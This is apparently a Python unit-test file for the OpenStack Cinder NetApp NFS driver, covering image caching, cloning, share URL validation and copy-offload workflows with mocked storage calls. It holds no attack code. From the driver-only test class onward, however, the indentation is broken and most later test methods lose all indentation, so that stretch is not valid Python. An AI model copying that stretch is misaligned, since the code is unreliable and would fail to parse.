        """Return a parsed net-interface-info fixture as NaElement children."""
        res = """<attributes-list>
                        <net-interface-info>
                        <address>127.0.0.1</address>
                        <administrative-status>up</administrative-status>
                        <current-node>fas3170rre-cmode-01</current-node>
                        <current-port>e1b-1165</current-port>
                        <data-protocols>
                          <data-protocol>nfs</data-protocol>
                        </data-protocols>
                        <dns-domain-name>none</dns-domain-name>
                        <failover-group/>
                        <failover-policy>disabled</failover-policy>
                        <firewall-policy>data</firewall-policy>
                        <home-node>fas3170rre-cmode-01</home-node>
                        <home-port>e1b-1165</home-port>
                        <interface-name>nfs_data1</interface-name>
                        <is-auto-revert>false</is-auto-revert>
                        <is-home>true</is-home>
                        <netmask>255.255.255.0</netmask>
                        <netmask-length>24</netmask-length>
                        <operational-status>up</operational-status>
                        <role>data</role>
                        <routing-group-name>c10.63.165.0/24</routing-group-name>
                        <use-failover-group>disabled</use-failover-group>
                        <vserver>openstack</vserver>
                      </net-interface-info></attributes-list>"""
        response_el = etree.XML(res)
        return api.NaElement(response_el).get_children()

    def test_clone_volume(self):
        """_clone_volume drives the expected file-clone call sequence."""
        drv = self._driver
        mox = self._prepare_clone_mock('pass')
        mox.ReplayAll()
        volume_name = 'volume_name'
        clone_name = 'clone_name'
        volume_id = volume_name + str(hash(volume_name))
        share = 'ip:/share'
        drv._clone_volume(volume_name, clone_name, volume_id, share)
        mox.VerifyAll()

    def test_register_img_in_cache_noshare(self):
        """Image registration clones into the volume's own share."""
        volume = {'id': '1', 'name': 'testvol'}
        volume['provider_location'] = '10.61.170.1:/share/path'
        drv = self._driver
        mox = self.mox
        mox.StubOutWithMock(drv, '_do_clone_rel_img_cache')
        drv._do_clone_rel_img_cache('testvol', 'img-cache-12345',
                                    '10.61.170.1:/share/path',
                                    'img-cache-12345')
        mox.ReplayAll()
        drv._register_image_in_cache(volume, '12345')
        mox.VerifyAll()

    def test_register_img_in_cache_with_share(self):
        """Image registration uses the provider_location share."""
        volume = {'id': '1', 'name': 'testvol'}
        volume['provider_location'] = '10.61.170.1:/share/path'
        drv = self._driver
        mox = self.mox
        mox.StubOutWithMock(drv, '_do_clone_rel_img_cache')
        drv._do_clone_rel_img_cache('testvol', 'img-cache-12345',
                                    '10.61.170.1:/share/path',
                                    'img-cache-12345')
        mox.ReplayAll()
        drv._register_image_in_cache(volume, '12345')
        mox.VerifyAll()

    def test_find_image_in_cache_no_shares(self):
        """Cache lookup returns nothing when no shares are mounted."""
        drv = self._driver
        drv._mounted_shares = []
        result = drv._find_image_in_cache('image_id')
        if not result:
            pass
        else:
            self.fail('Return result is unexpected')

    def test_find_image_in_cache_shares(self):
        """Cache lookup finds the cached image file on a mounted share."""
        drv = self._driver
        mox = self.mox
        drv._mounted_shares = ['testshare']
        mox.StubOutWithMock(drv, '_get_mount_point_for_share')
        mox.StubOutWithMock(os.path, 'exists')
        drv._get_mount_point_for_share('testshare').AndReturn('/mnt')
        os.path.exists('/mnt/img-cache-id').AndReturn(True)
        mox.ReplayAll()
        result = drv._find_image_in_cache('id')
        (share, file_name) = result[0]
        mox.VerifyAll()
        drv._mounted_shares.remove('testshare')
        if (share == 'testshare' and file_name == 'img-cache-id'):
            pass
        else:
            LOG.warn(_("Share %(share)s and file name %(file_name)s")
                     % {'share': share, 'file_name': file_name})
            self.fail('Return result is unexpected')

    def test_find_old_cache_files_notexists(self):
        """find returns no files when the find(1) output is empty."""
        drv = self._driver
        mox = self.mox
        cmd = ['find', '/mnt', '-maxdepth', '1', '-name',
               'img-cache*', '-amin', '+720']
        setattr(drv.configuration, 'expiry_thres_minutes', 720)
        mox.StubOutWithMock(drv, '_get_mount_point_for_share')
        mox.StubOutWithMock(drv, '_execute')
        drv._get_mount_point_for_share(IgnoreArg()).AndReturn('/mnt')
        drv._execute(*cmd, run_as_root=True).AndReturn((None, ''))
        mox.ReplayAll()
        res = drv._find_old_cache_files('share')
        mox.VerifyAll()
        if len(res) == 0:
            pass
        else:
            self.fail('No files expected but got return values.')

    def test_find_old_cache_files_exists(self):
        """find returns the deletion-eligible cache files it discovers."""
        drv = self._driver
        mox = self.mox
        cmd = ['find', '/mnt', '-maxdepth', '1', '-name',
               'img-cache*', '-amin', '+720']
        setattr(drv.configuration, 'expiry_thres_minutes', '720')
        files = '/mnt/img-id1\n/mnt/img-id2\n'
        r_files = ['img-id1', 'img-id2']
        mox.StubOutWithMock(drv, '_get_mount_point_for_share')
        mox.StubOutWithMock(drv, '_execute')
        mox.StubOutWithMock(drv, '_shortlist_del_eligible_files')
        drv._get_mount_point_for_share('share').AndReturn('/mnt')
        drv._execute(*cmd, run_as_root=True).AndReturn((files, None))
        drv._shortlist_del_eligible_files(
            IgnoreArg(), r_files).AndReturn(r_files)
        mox.ReplayAll()
        res = drv._find_old_cache_files('share')
        mox.VerifyAll()
        if len(res) == len(r_files):
            for f in res:
                r_files.remove(f)
        else:
            self.fail('Returned files not same as expected.')

    def test_delete_files_till_bytes_free_success(self):
        """Files are deleted largest-first until enough bytes are freed."""
        drv = self._driver
        mox = self.mox
        files = [('img-cache-1', 230), ('img-cache-2', 380)]
        mox.StubOutWithMock(drv, '_get_mount_point_for_share')
        mox.StubOutWithMock(drv, '_delete_file')
        drv._get_mount_point_for_share(IgnoreArg()).AndReturn('/mnt')
        drv._delete_file('/mnt/img-cache-2').AndReturn(True)
        drv._delete_file('/mnt/img-cache-1').AndReturn(True)
        mox.ReplayAll()
        drv._delete_files_till_bytes_free(files, 'share', bytes_to_free=1024)
        mox.VerifyAll()

    def test_clean_image_cache_exec(self):
        """Cache cleaning runs when free space is below the start threshold."""
        drv = self._driver
        mox = self.mox
        drv.configuration.thres_avl_size_perc_start = 20
        drv.configuration.thres_avl_size_perc_stop = 50
        drv._mounted_shares = ['testshare']
        mox.StubOutWithMock(drv, '_find_old_cache_files')
        mox.StubOutWithMock(drv, '_delete_files_till_bytes_free')
        mox.StubOutWithMock(drv, '_get_capacity_info')
        drv._get_capacity_info('testshare').AndReturn((100, 19, 81))
        drv._find_old_cache_files('testshare').AndReturn(['f1', 'f2'])
        drv._delete_files_till_bytes_free(
            ['f1', 'f2'], 'testshare', bytes_to_free=31)
        mox.ReplayAll()
        drv._clean_image_cache()
        mox.VerifyAll()
        drv._mounted_shares.remove('testshare')
        if not drv.cleaning:
            pass
        else:
            self.fail('Clean image cache failed.')

    def test_clean_image_cache_noexec(self):
        """Cache cleaning is skipped when free space is above the threshold."""
        drv = self._driver
        mox = self.mox
        drv.configuration.thres_avl_size_perc_start = 20
        drv.configuration.thres_avl_size_perc_stop = 50
        drv._mounted_shares = ['testshare']
        mox.StubOutWithMock(drv, '_get_capacity_info')
        drv._get_capacity_info('testshare').AndReturn((100, 30, 70))
        mox.ReplayAll()
        drv._clean_image_cache()
        mox.VerifyAll()
        drv._mounted_shares.remove('testshare')
        if not drv.cleaning:
            pass
        else:
            self.fail('Clean image cache failed.')

    def test_clone_image_fromcache(self):
        """clone_image uses a compatible cached copy when one exists."""
        drv = self._driver
        mox = self.mox
        volume = {'name': 'vol', 'size': '20'}
        mox.StubOutWithMock(drv, '_find_image_in_cache')
        mox.StubOutWithMock(drv, '_do_clone_rel_img_cache')
        mox.StubOutWithMock(drv, '_post_clone_image')
        mox.StubOutWithMock(drv, '_is_share_vol_compatible')
        drv._find_image_in_cache(IgnoreArg()).AndReturn(
            [('share', 'file_name')])
        drv._is_share_vol_compatible(IgnoreArg(), IgnoreArg()).AndReturn(True)
        drv._do_clone_rel_img_cache('file_name', 'vol', 'share', 'file_name')
        drv._post_clone_image(volume)
        mox.ReplayAll()
        drv.clone_image(volume, ('image_location', None), 'image_id', {})
        mox.VerifyAll()

    def get_img_info(self, format):
        """Return a minimal qemu-img-info-like object reporting *format*."""
        class img_info(object):
            def __init__(self, fmt):
                self.file_format = fmt
        return img_info(format)

    def test_clone_image_cloneableshare_nospace(self):
        """clone_image bails out when the share lacks capacity."""
        drv = self._driver
        mox = self.mox
        volume = {'name': 'vol', 'size': '20'}
        mox.StubOutWithMock(drv, '_find_image_in_cache')
        mox.StubOutWithMock(drv, '_is_cloneable_share')
        mox.StubOutWithMock(drv, '_is_share_vol_compatible')
        drv._find_image_in_cache(IgnoreArg()).AndReturn([])
        drv._is_cloneable_share(IgnoreArg()).AndReturn('127.0.0.1:/share')
        drv._is_share_vol_compatible(IgnoreArg(), IgnoreArg()).AndReturn(False)
        mox.ReplayAll()
        (prop, cloned) = drv.clone_image(
            volume, ('nfs://127.0.0.1:/share/img-id', None), 'image_id', {})
        mox.VerifyAll()
        if not cloned and not prop['provider_location']:
            pass
        else:
            self.fail('Expected not cloned, got cloned.')

    def test_clone_image_cloneableshare_raw(self):
        """A raw image on a cloneable share is cloned directly."""
        drv = self._driver
        mox = self.mox
        volume = {'name': 'vol', 'size': '20'}
        mox.StubOutWithMock(drv, '_find_image_in_cache')
        mox.StubOutWithMock(drv, '_is_cloneable_share')
        mox.StubOutWithMock(drv, '_get_mount_point_for_share')
        mox.StubOutWithMock(image_utils, 'qemu_img_info')
        mox.StubOutWithMock(drv, '_clone_volume')
        mox.StubOutWithMock(drv, '_discover_file_till_timeout')
        mox.StubOutWithMock(drv, '_set_rw_permissions_for_all')
        mox.StubOutWithMock(drv, '_resize_image_file')
        mox.StubOutWithMock(drv, '_is_share_vol_compatible')
        drv._find_image_in_cache(IgnoreArg()).AndReturn([])
        drv._is_cloneable_share(IgnoreArg()).AndReturn('127.0.0.1:/share')
        drv._is_share_vol_compatible(IgnoreArg(), IgnoreArg()).AndReturn(True)
        drv._get_mount_point_for_share(IgnoreArg()).AndReturn('/mnt')
        image_utils.qemu_img_info('/mnt/img-id').AndReturn(
            self.get_img_info('raw'))
        drv._clone_volume(
            'img-id', 'vol', share='127.0.0.1:/share', volume_id=None)
        drv._get_mount_point_for_share(IgnoreArg()).AndReturn('/mnt')
        drv._discover_file_till_timeout(IgnoreArg()).AndReturn(True)
        drv._set_rw_permissions_for_all('/mnt/vol')
        drv._resize_image_file({'name': 'vol'}, IgnoreArg())
        mox.ReplayAll()
        drv.clone_image(
            volume, ('nfs://127.0.0.1:/share/img-id', None), 'image_id', {})
        mox.VerifyAll()

    def test_clone_image_cloneableshare_notraw(self):
        """A non-raw image is converted to raw before being used."""
        drv = self._driver
        mox = self.mox
        volume = {'name': 'vol', 'size': '20'}
        mox.StubOutWithMock(drv, '_find_image_in_cache')
        mox.StubOutWithMock(drv, '_is_cloneable_share')
        mox.StubOutWithMock(drv, '_get_mount_point_for_share')
        mox.StubOutWithMock(image_utils, 'qemu_img_info')
        mox.StubOutWithMock(drv, '_clone_volume')
        mox.StubOutWithMock(drv, '_discover_file_till_timeout')
        mox.StubOutWithMock(drv, '_set_rw_permissions_for_all')
        mox.StubOutWithMock(drv, '_resize_image_file')
        mox.StubOutWithMock(image_utils, 'convert_image')
        mox.StubOutWithMock(drv, '_register_image_in_cache')
        mox.StubOutWithMock(drv, '_is_share_vol_compatible')
        drv._find_image_in_cache(IgnoreArg()).AndReturn([])
        drv._is_cloneable_share('nfs://127.0.0.1/share/img-id').AndReturn(
            '127.0.0.1:/share')
        drv._is_share_vol_compatible(IgnoreArg(), IgnoreArg()).AndReturn(True)
        drv._get_mount_point_for_share('127.0.0.1:/share').AndReturn('/mnt')
        image_utils.qemu_img_info('/mnt/img-id').AndReturn(
            self.get_img_info('notraw'))
        image_utils.convert_image(IgnoreArg(), IgnoreArg(), 'raw')
        image_utils.qemu_img_info('/mnt/vol').AndReturn(
            self.get_img_info('raw'))
        drv._register_image_in_cache(IgnoreArg(), IgnoreArg())
        drv._get_mount_point_for_share('127.0.0.1:/share').AndReturn('/mnt')
        drv._discover_file_till_timeout(IgnoreArg()).AndReturn(True)
        drv._set_rw_permissions_for_all('/mnt/vol')
        drv._resize_image_file({'name': 'vol'}, IgnoreArg())
        mox.ReplayAll()
        drv.clone_image(
            volume, ('nfs://127.0.0.1/share/img-id', None), 'image_id', {})
        mox.VerifyAll()

    def test_clone_image_file_not_discovered(self):
        """clone_image cleans up and reports failure if the file never shows."""
        drv = self._driver
        mox = self.mox
        volume = {'name': 'vol', 'size': '20'}
        mox.StubOutWithMock(drv, '_find_image_in_cache')
        mox.StubOutWithMock(drv, '_is_cloneable_share')
        mox.StubOutWithMock(drv, '_get_mount_point_for_share')
        mox.StubOutWithMock(image_utils, 'qemu_img_info')
        mox.StubOutWithMock(drv, '_clone_volume')
        mox.StubOutWithMock(drv, '_discover_file_till_timeout')
        mox.StubOutWithMock(image_utils, 'convert_image')
        mox.StubOutWithMock(drv, '_register_image_in_cache')
        mox.StubOutWithMock(drv, '_is_share_vol_compatible')
        mox.StubOutWithMock(drv, 'local_path')
        mox.StubOutWithMock(os.path, 'exists')
        mox.StubOutWithMock(drv, '_delete_file')
        drv._find_image_in_cache(IgnoreArg()).AndReturn([])
        drv._is_cloneable_share('nfs://127.0.0.1/share/img-id').AndReturn(
            '127.0.0.1:/share')
        drv._is_share_vol_compatible(IgnoreArg(), IgnoreArg()).AndReturn(True)
        drv._get_mount_point_for_share('127.0.0.1:/share').AndReturn('/mnt')
        image_utils.qemu_img_info('/mnt/img-id').AndReturn(
            self.get_img_info('notraw'))
        image_utils.convert_image(IgnoreArg(), IgnoreArg(), 'raw')
        image_utils.qemu_img_info('/mnt/vol').AndReturn(
            self.get_img_info('raw'))
        drv._register_image_in_cache(IgnoreArg(), IgnoreArg())
        drv.local_path(IgnoreArg()).AndReturn('/mnt/vol')
        drv._discover_file_till_timeout(IgnoreArg()).AndReturn(False)
        drv.local_path(IgnoreArg()).AndReturn('/mnt/vol')
        os.path.exists('/mnt/vol').AndReturn(True)
        drv._delete_file('/mnt/vol')
        mox.ReplayAll()
        vol_dict, result = drv.clone_image(
            volume, ('nfs://127.0.0.1/share/img-id', None), 'image_id', {})
        mox.VerifyAll()
        self.assertFalse(result)
        self.assertFalse(vol_dict['bootable'])
        self.assertIsNone(vol_dict['provider_location'])

    def test_clone_image_resizefails(self):
        """clone_image cleans up and reports failure when the resize fails."""
        drv = self._driver
        mox = self.mox
        volume = {'name': 'vol', 'size': '20'}
        mox.StubOutWithMock(drv, '_find_image_in_cache')
        mox.StubOutWithMock(drv, '_is_cloneable_share')
        mox.StubOutWithMock(drv, '_get_mount_point_for_share')
        mox.StubOutWithMock(image_utils, 'qemu_img_info')
        mox.StubOutWithMock(drv, '_clone_volume')
        mox.StubOutWithMock(drv, '_discover_file_till_timeout')
        mox.StubOutWithMock(drv, '_set_rw_permissions_for_all')
        mox.StubOutWithMock(drv, '_resize_image_file')
        mox.StubOutWithMock(image_utils, 'convert_image')
        mox.StubOutWithMock(drv, '_register_image_in_cache')
        mox.StubOutWithMock(drv, '_is_share_vol_compatible')
        mox.StubOutWithMock(drv, 'local_path')
        mox.StubOutWithMock(os.path, 'exists')
        mox.StubOutWithMock(drv, '_delete_file')
        drv._find_image_in_cache(IgnoreArg()).AndReturn([])
        drv._is_cloneable_share('nfs://127.0.0.1/share/img-id').AndReturn(
            '127.0.0.1:/share')
        drv._is_share_vol_compatible(IgnoreArg(), IgnoreArg()).AndReturn(True)
        drv._get_mount_point_for_share('127.0.0.1:/share').AndReturn('/mnt')
        image_utils.qemu_img_info('/mnt/img-id').AndReturn(
            self.get_img_info('notraw'))
        image_utils.convert_image(IgnoreArg(), IgnoreArg(), 'raw')
        image_utils.qemu_img_info('/mnt/vol').AndReturn(
            self.get_img_info('raw'))
        drv._register_image_in_cache(IgnoreArg(), IgnoreArg())
        drv.local_path(IgnoreArg()).AndReturn('/mnt/vol')
        drv._discover_file_till_timeout(IgnoreArg()).AndReturn(True)
        drv._set_rw_permissions_for_all('/mnt/vol')
        drv._resize_image_file(
            IgnoreArg(), IgnoreArg()).AndRaise(exception.InvalidResults())
        drv.local_path(IgnoreArg()).AndReturn('/mnt/vol')
        os.path.exists('/mnt/vol').AndReturn(True)
        drv._delete_file('/mnt/vol')
        mox.ReplayAll()
        vol_dict, result = drv.clone_image(
            volume, ('nfs://127.0.0.1/share/img-id', None), 'image_id', {})
        mox.VerifyAll()
        self.assertFalse(result)
        self.assertFalse(vol_dict['bootable'])
        self.assertIsNone(vol_dict['provider_location'])

    def test_is_cloneable_share_badformats(self):
        """None of the malformed share URLs should be considered cloneable."""
        drv = self._driver
        # NOTE: the last two entries below used to be fused into one string
        # by a missing comma (implicit literal concatenation), so the
        # 'nfs://com.netapp.com//img' case was never actually exercised.
        strgs = ['10.61.666.22:/share/img',
                 'nfs://10.61.666.22:/share/img',
                 'nfs://10.61.666.22//share/img',
                 'nfs://com.netapp.com:/share/img',
                 'nfs://com.netapp.com//share/img',
                 'com.netapp.com://share/im\g',
                 'http://com.netapp.com://share/img',
                 'nfs://com.netapp.com:/share/img',
                 'nfs://com.netapp.com:8080//share/img',
                 'nfs://com.netapp.com//img',
                 'nfs://[ae::sr::ty::po]/img']
        for strg in strgs:
            res = drv._is_cloneable_share(strg)
            if res:
                msg = 'Invalid format matched for url %s.' % strg
                self.fail(msg)

    def test_is_cloneable_share_goodformat1(self):
        """host/share/img form is accepted."""
        drv = self._driver
        mox = self.mox
        strg = 'nfs://10.61.222.333/share/img'
        mox.StubOutWithMock(drv, '_check_share_in_use')
        drv._check_share_in_use(IgnoreArg(), IgnoreArg()).AndReturn('share')
        mox.ReplayAll()
        drv._is_cloneable_share(strg)
        mox.VerifyAll()

    def test_is_cloneable_share_goodformat2(self):
        """host:port/share/img form is accepted."""
        drv = self._driver
        mox = self.mox
        strg = 'nfs://10.61.222.333:8080/share/img'
        mox.StubOutWithMock(drv, '_check_share_in_use')
        drv._check_share_in_use(IgnoreArg(), IgnoreArg()).AndReturn('share')
        mox.ReplayAll()
        drv._is_cloneable_share(strg)
        mox.VerifyAll()

    def test_is_cloneable_share_goodformat3(self):
        """hostname:port/share/img form is accepted."""
        drv = self._driver
        mox = self.mox
        strg = 'nfs://com.netapp:8080/share/img'
        mox.StubOutWithMock(drv, '_check_share_in_use')
        drv._check_share_in_use(IgnoreArg(), IgnoreArg()).AndReturn('share')
        mox.ReplayAll()
        drv._is_cloneable_share(strg)
        mox.VerifyAll()

    def test_is_cloneable_share_goodformat4(self):
        """hostname/share/img form is accepted."""
        drv = self._driver
        mox = self.mox
        strg = 'nfs://netapp.com/share/img'
        mox.StubOutWithMock(drv, '_check_share_in_use')
        drv._check_share_in_use(IgnoreArg(), IgnoreArg()).AndReturn('share')
        mox.ReplayAll()
        drv._is_cloneable_share(strg)
        mox.VerifyAll()

    def test_is_cloneable_share_goodformat5(self):
        """hostname/img form (no share path) is accepted."""
        drv = self._driver
        mox = self.mox
        strg = 'nfs://netapp.com/img'
        mox.StubOutWithMock(drv, '_check_share_in_use')
        drv._check_share_in_use(IgnoreArg(), IgnoreArg()).AndReturn('share')
        mox.ReplayAll()
        drv._is_cloneable_share(strg)
        mox.VerifyAll()

    def test_check_share_in_use_no_conn(self):
        """No share is reported for a missing connection string."""
        drv = self._driver
        share = drv._check_share_in_use(None, '/dir')
        if share:
            self.fail('Unexpected share detected.')

    def test_check_share_in_use_invalid_conn(self):
        """No share is reported for a connection string without a host."""
        drv = self._driver
        share = drv._check_share_in_use(':8989', '/dir')
        if share:
            self.fail('Unexpected share detected.')

    def test_check_share_in_use_incorrect_host(self):
        """Hostname resolution failures are swallowed and yield no share."""
        drv = self._driver
        mox = self.mox
        mox.StubOutWithMock(utils, 'resolve_hostname')
        utils.resolve_hostname(IgnoreArg()).AndRaise(Exception())
        mox.ReplayAll()
        share = drv._check_share_in_use('incorrect:8989', '/dir')
        mox.VerifyAll()
        if share:
            self.fail('Unexpected share detected.')

    def test_check_share_in_use_success(self):
        """A mounted share matching the resolved IP is reported."""
        drv = self._driver
        mox = self.mox
        drv._mounted_shares = ['127.0.0.1:/dir/share']
        mox.StubOutWithMock(utils, 'resolve_hostname')
        mox.StubOutWithMock(drv, '_share_match_for_ip')
        utils.resolve_hostname(IgnoreArg()).AndReturn('10.22.33.44')
        drv._share_match_for_ip(
            '10.22.33.44', ['127.0.0.1:/dir/share']).AndReturn('share')
        mox.ReplayAll()
        share = drv._check_share_in_use('127.0.0.1:8989', '/dir/share')
        mox.VerifyAll()
        if not share:
            self.fail('Expected share not detected')

    def test_construct_image_url_loc(self):
        """NFS url is built from glance location metadata."""
        drv = self._driver
        img_loc = (None,
                   [{'metadata':
                     {'share_location': 'nfs://host/path',
                      'mount_point': '/opt/stack/data/glance',
                      'type': 'nfs'},
                     'url': 'file:///opt/stack/data/glance/image-id'}])
        location = drv._construct_image_nfs_url(img_loc)
        if location != "nfs://host/path/image-id":
            self.fail("Unexpected direct url.")

    def test_construct_image_url_direct(self):
        """A direct NFS url is passed through unchanged."""
        drv = self._driver
        img_loc = ("nfs://host/path/image-id", None)
        location = drv._construct_image_nfs_url(img_loc)
        if location != "nfs://host/path/image-id":
            self.fail("Unexpected direct url.")
class NetappDirectCmodeNfsDriverOnlyTestCase(test.TestCase):
"""Test direct NetApp C Mode driver only and not inherit."""
    def setUp(self):
        """Run the base TestCase setup, then the driver-specific setup."""
        super(NetappDirectCmodeNfsDriverOnlyTestCase, self).setUp()
        self._custom_setup()
    def _custom_setup(self):
        """Build the driver in proxy mode with SSC and copy offload enabled."""
        kwargs = {}
        kwargs['netapp_mode'] = 'proxy'
        kwargs['configuration'] = create_configuration()
        self._driver = netapp_nfs.NetAppDirectCmodeNfsDriver(**kwargs)
        self._driver.ssc_enabled = True
        self._driver.configuration.netapp_copyoffload_tool_path = 'cof_path'
    @mock.patch.object(netapp_nfs, 'get_volume_extra_specs')
    def test_create_volume(self, mock_volume_extra_specs):
        """create_volume picks a share and reports it as provider_location."""
        drv = self._driver
        drv.ssc_enabled = False
        extra_specs = {}
        mock_volume_extra_specs.return_value = extra_specs
        fake_share = 'localhost:myshare'
        with mock.patch.object(drv, '_ensure_shares_mounted'):
            with mock.patch.object(drv, '_find_shares',
                                   return_value=['localhost:myshare']):
                with mock.patch.object(drv, '_do_create_volume'):
                    volume_info = self._driver.create_volume(FakeVolume(1))
                    self.assertEqual(volume_info.get('provider_location'),
                                     fake_share)
@mock.patch.object(netapp_nfs, 'get_volume_extra_specs')
def test_create_volume_with_qos_policy(self, mock_volume_extra_specs):
drv = self._driver
drv.ssc_enabled = False
extra_specs = {'netapp:qos_policy_group': 'qos_policy_1'}
fake_volume = FakeVolume(1)
fake_share = 'localhost:myshare'
fake_qos_policy = 'qos_policy_1'
mock_volume_extra_specs.return_value = extra_specs
with mock.patch.object(drv, '_ensure_shares_mounted'):
with mock.patch.object(drv, '_find_shares',
return_value=['localhost:myshare']):
with mock.patch.object(drv, '_do_create_volume'):
with mock.patch.object(drv,
'_set_qos_policy_group_on_volume'
) as mock_set_qos:
volume_info = self._driver.create_volume(fake_volume)
self.assertEqual(volume_info.get('provider_location'),
'localhost:myshare')
mock_set_qos.assert_called_once_with(fake_volume,
fake_share,
fake_qos_policy)
def test_copy_img_to_vol_copyoffload_success(self):
drv = self._driver
context = object()
volume = {'id': 'vol_id', 'name': 'name'}
image_service = object()
image_id = 'image_id'
drv._client = mock.Mock()
drv._client.get_api_version = mock.Mock(return_value=(1, 20))
drv._try_copyoffload = mock.Mock()
drv._get_provider_location = mock.Mock(return_value='share')
drv._get_vol_for_share = mock.Mock(return_value='vol')
drv._update_stale_vols = mock.Mock()
drv.copy_image_to_volume(context, volume, image_service, image_id)
drv._try_copyoffload.assert_called_once_with(context, volume,
image_service,
image_id)
drv._update_stale_vols.assert_called_once_with('vol')
def test_copy_img_to_vol_copyoffload_failure(self):
drv = self._driver
context = object()
volume = {'id': 'vol_id', 'name': 'name'}
image_service = object()
image_id = 'image_id'
drv._client = mock.Mock()
drv._client.get_api_version = mock.Mock(return_value=(1, 20))
drv._try_copyoffload = mock.Mock(side_effect=Exception())
netapp_nfs.NetAppNFSDriver.copy_image_to_volume = mock.Mock()
drv._get_provider_location = mock.Mock(return_value='share')
drv._get_vol_for_share = mock.Mock(return_value='vol')
drv._update_stale_vols = mock.Mock()
drv.copy_image_to_volume(context, volume, image_service, image_id)
drv._try_copyoffload.assert_called_once_with(context, volume,
image_service,
image_id)
netapp_nfs.NetAppNFSDriver.copy_image_to_volume.\
assert_called_once_with(context, volume, image_service, image_id)
drv._update_stale_vols.assert_called_once_with('vol')
def test_copy_img_to_vol_copyoffload_nonexistent_binary_path(self):
drv = self._driver
context = object()
volume = {'id': 'vol_id', 'name': 'name'}
image_service = mock.Mock()
image_service.get_location.return_value = (mock.Mock(), mock.Mock())
image_service.show.return_value = {'size': 0}
image_id = 'image_id'
drv._client = mock.Mock()
drv._client.get_api_version = mock.Mock(return_value=(1, 20))
drv._find_image_in_cache = mock.Mock(return_value=[])
drv._construct_image_nfs_url = mock.Mock(return_value="")
drv._check_get_nfs_path_segs = mock.Mock(return_value=("test:test",
"dr"))
drv._get_ip_verify_on_cluster = mock.Mock(return_value="192.1268.1.1")
drv._get_mount_point_for_share = mock.Mock(return_value='mnt_point')
drv._get_host_ip = mock.Mock()
drv._get_provider_location = mock.Mock()
drv._get_export_path = mock.Mock(return_value="dr")
drv._check_share_can_hold_size = mock.Mock()
# Raise error as if the copyoffload file can not be found
drv._clone_file_dst_exists = mock.Mock(side_effect=OSError())
# Verify the original error is propagated
self.assertRaises(OSError, drv._try_copyoffload,
context, volume, image_service, image_id)
def test_copyoffload_frm_cache_success(self):
drv = self._driver
context = object()
volume = {'id': 'vol_id', 'name': 'name'}
image_service = object()
image_id = 'image_id'
drv._find_image_in_cache = mock.Mock(return_value=[('share', 'img')])
drv._copy_from_cache = mock.Mock(return_value=True)
drv._try_copyoffload(context, volume, image_service, image_id)
drv._copy_from_cache.assert_called_once_with(volume,
image_id,
[('share', 'img')])
def test_copyoffload_frm_img_service_success(self):
drv = self._driver
context = object()
volume = {'id': 'vol_id', 'name': 'name'}
image_service = object()
image_id = 'image_id'
drv._client = mock.Mock()
drv._client.get_api_version = mock.Mock(return_value=(1, 20))
drv._find_image_in_cache = mock.Mock(return_value=[])
drv._copy_from_img_service = mock.Mock()
drv._try_copyoffload(context, volume, image_service, image_id)
drv._copy_from_img_service.assert_called_once_with(context,
volume,
image_service,
image_id)
def test_cache_copyoffload_workflow_success(self):
drv = self._driver
volume = {'id': 'vol_id', 'name': 'name', 'size': 1}
image_id = 'image_id'
cache_result = [('ip1:/openstack', 'img-cache-imgid')]
drv._get_ip_verify_on_cluster = mock.Mock(return_value='ip1')
drv._get_host_ip = mock.Mock(return_value='ip2')
drv._get_export_path = mock.Mock(return_value='/exp_path')
drv._execute = mock.Mock()
drv._register_image_in_cache = mock.Mock()
drv._get_provider_location = mock.Mock(return_value='/share')
drv._post_clone_image = mock.Mock()
copied = drv._copy_from_cache(volume, image_id, cache_result)
self.assertTrue(copied)
drv._get_ip_verify_on_cluster.assert_any_call('ip1')
drv._get_export_path.assert_called_with('vol_id')
drv._execute.assert_called_once_with('cof_path', 'ip1', 'ip1',
'/openstack/img-cache-imgid',
'/exp_path/name',
run_as_root=False,
check_exit_code=0)
drv._post_clone_image.assert_called_with(volume)
drv._get_provider_location.assert_called_with('vol_id')
@mock.patch.object(image_utils, 'qemu_img_info')
def test_img_service_raw_copyoffload_workflow_success(self,
mock_qemu_img_info):
drv = self._driver
volume = {'id': 'vol_id', 'name': 'name', 'size': 1}
image_id = 'image_id'
context = object()
image_service = mock.Mock()
image_service.get_location.return_value = ('nfs://ip1/openstack/img',
None)
image_service.show.return_value = {'size': 1,
'disk_format': 'raw'}
drv._check_get_nfs_path_segs = mock.Mock(return_value=
('ip1', '/openstack'))
drv._get_ip_verify_on_cluster = mock.Mock(return_value='ip1')
drv._get_host_ip = mock.Mock(return_value='ip2')
drv._get_export_path = mock.Mock(return_value='/exp_path')
drv._get_provider_location = mock.Mock(return_value='share')
drv._execute = mock.Mock()
drv._get_mount_point_for_share = mock.Mock(return_value='mnt_point')
drv._discover_file_till_timeout = mock.Mock(return_value=True)
img_inf = mock.Mock()
img_inf.file_format = 'raw'
mock_qemu_img_info.return_value = img_inf
drv._check_share_can_hold_size = mock.Mock()
drv._move_nfs_file = mock.Mock(return_value=True)
drv._delete_file = mock.Mock()
drv._clone_file_dst_exists = mock.Mock()
drv._post_clone_image = mock.Mock()
drv._copy_from_img_service(context, volume, image_service, image_id)
drv._get_ip_verify_on_cluster.assert_any_call('ip1')
drv._get_export_path.assert_called_with('vol_id')
drv._check_share_can_hold_size.assert_called_with('share', 1)
assert drv._execute.call_count == 1
drv._post_clone_image.assert_called_with(volume)
@mock.patch.object(image_utils, 'convert_image')
@mock.patch.object(image_utils, 'qemu_img_info')
@mock.patch('os.path.exists')
def test_img_service_qcow2_copyoffload_workflow_success(self, mock_exists,
mock_qemu_img_info,
mock_cvrt_image):
drv = self._driver
volume = {'id': 'vol_id', 'name': 'name', 'size': 1}
image_id = 'image_id'
context = object()
image_service = mock.Mock()
image_service.get_location.return_value = ('nfs://ip1/openstack/img',
None)
image_service.show.return_value = {'size': 1,
'disk_format': 'qcow2'}
drv._check_get_nfs_path_segs = mock.Mock(return_value=
('ip1', '/openstack'))
drv._get_ip_verify_on_cluster = mock.Mock(return_value='ip1')
drv._get_host_ip = mock.Mock(return_value='ip2')
drv._get_export_path = mock.Mock(return_value='/exp_path')
drv._get_provider_location = mock.Mock(return_value='share')
drv._execute = mock.Mock()
drv._get_mount_point_for_share = mock.Mock(return_value='mnt_point')
img_inf = mock.Mock()
img_inf.file_format = 'raw'
mock_qemu_img_info.return_value = img_inf
drv._check_share_can_hold_size = mock.Mock()
drv._move_nfs_file = mock.Mock(return_value=True)
drv._delete_file = mock.Mock()
drv._clone_file_dst_exists = mock.Mock()
drv._post_clone_image = mock.Mock()
drv._copy_from_img_service(context, volume, image_service, image_id)
